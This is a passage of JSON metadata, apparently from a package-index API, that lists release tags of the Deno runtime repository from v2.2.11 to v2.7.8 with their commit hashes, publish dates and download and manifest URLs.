,"kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/